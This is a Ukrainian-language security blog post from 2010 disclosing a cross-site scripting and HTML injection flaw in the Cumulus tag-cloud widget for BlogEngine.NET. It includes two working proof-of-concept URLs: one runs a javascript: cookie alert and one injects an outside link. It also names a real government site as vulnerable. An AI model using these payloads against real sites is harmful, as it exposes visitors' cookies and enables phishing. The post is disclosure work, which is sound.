Уразливість у віджеті Cumulus для BlogEngine.NET
23:54 10.05.2010Раніше я вже писав про уразливості в t3m_cumulus_tagcloud для TYPO3. Така ж XSS уразливість є й у віджеті Cumulus для BlogEngine.NET, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.
У квітні, 30.04.2010, я знайшов Cross-Site Scripting уразливість у віджеті Cumulus для BlogEngine.NET. Дірку виявив на сайті http://planning.maryland.gov. Про що найближчим часом повідомлю розробникам.
XSS:
http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Код виконається при кліку. Це Strictly social XSS.
Також можна провести HTML Injection атаку, в тому числі на ті флешки, де заборонені (у флешках чи через WAF) javascript та vbscript URI в параметрі tagcloud.
HTML Injection:
http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Уразливі всі версії Cumulus для BlogEngine.NET.